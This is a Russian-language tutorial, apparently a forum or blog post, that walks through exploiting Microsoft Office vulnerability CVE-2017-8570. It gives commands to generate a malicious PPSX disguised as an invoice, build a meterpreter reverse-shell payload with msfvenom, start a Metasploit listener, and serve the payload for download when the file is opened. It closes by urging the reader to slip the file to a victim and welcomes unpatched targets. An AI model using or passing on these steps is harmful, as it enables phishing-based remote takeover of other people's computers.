Уязвимость Microsoft Office CVE-2017-8570

Всем привет. Сегодня разберем такую уязвимость как Microsoft Office CVE 2017 8570.

Данная уязвимость довольно свежая, позволяет получить доступ к удаленной машине используя специально подготовленный файл PowerPoint.

Использована она может быть на следующих версиях:

Microsoft Office 2007 Service Pack 3

Microsoft Office 2010 Service Pack 2 (32-bit editions)

Microsoft Office 2010 Service Pack 2 (64-bit editions)

Microsoft Office 2013 RT Service Pack 1

Microsoft Office 2013 Service Pack 1 (32-bit editions)

Microsoft Office 2013 Service Pack 1 (64-bit editions)

Microsoft Office 2016 (32-bit edition)

Microsoft Office 2016 (64-bit edition)

На данный момент уязвимость устранена в текущих обновлениях, но, как мы знаем, что многие пренебрегают обновлениями, что нам конечно на руку.

Погнали

1. Заходим по ссылке ( https://github.com/tezukanice/Office8570 ) скачиваем, не забываем читать README.md , там будет рассмотрено три сценария атаки используя данную уязвимость. Мы в данной статье остановимся на первом сценарии.

Вкратце:

- генерируем наш вредоносный PPSX файл,

- создаем полезную нагрузку и запускаем слушатель.

- запускаем сервер на 80 порту.​

Создаем в директории «Office8570» новую папку и назовем ее «template», далее переносим файл template.ppsx в эту папку. Если этого не сделать то при генерировании PPSX файла выскочит ошибка.

1.Сейчас генерируем наш PPSX файл, пишем в терминале в одну строчку следующее:

python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u

http://192.168.0.104/logo.doc

Не забываем вместо моего ip ставить свой, если кто не знает как узнать свой ip, делается это командой ifconfig. У вас должен появится файл Invoice.ppsx.

2. Создаем полезную нагрузку,где будет создан файл shell.exe в каталоге tmp, в моем случае это будет выглядеть следующим образом:

msfvenom -p windows/meterpreter/

reverse_tcp LHOST=192.168.0.104

LPORT=4444 -f exe > /tmp/shell.exe

Для создания полезной нагрузки можем использовать любой другой инструмент, не обязательно использовать msfvenom, главное перенести полезную нагрузку потом в каталог tmp.

Запускаем слушатель:

msfconsole -x "use multi/handler; set

PAYLOAD windows/meterpreter/

reverse_tcp; set LHOST 192.168.0.104;

set LPORT 4444; run"

3.Далее в терминале пишем следующую строчку

python cve-2017-8570_toolkit.py -M exp

-e http://192.168.0.104/shell.exe -l /

tmp/shell.exe

по итогу, у нас запустится сервер на 80 порту.

Далее нам осталось впарить файл Invoice.ppsx , и как только его откроют ,с сервера погрузится наша полезная нагрузка.

Всем удачи!!